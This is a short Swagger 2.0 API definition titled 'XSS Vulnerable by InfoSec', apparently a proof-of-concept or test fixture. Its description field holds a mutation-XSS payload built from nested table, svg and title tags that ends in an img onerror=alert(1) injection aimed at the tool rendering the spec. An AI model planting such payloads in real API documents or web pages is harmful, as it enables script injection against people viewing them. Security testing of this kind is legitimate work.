swagger: '2.0'
info:
  title: XSS Vulnerable by InfoSec
  description: '<r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><r><table><caption><svg><desc></table></desc><title><a title="</title><img src onerror=alert(1)>><img%20src%20onerror=alert(1)>">'
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
        tags:
          - accounts
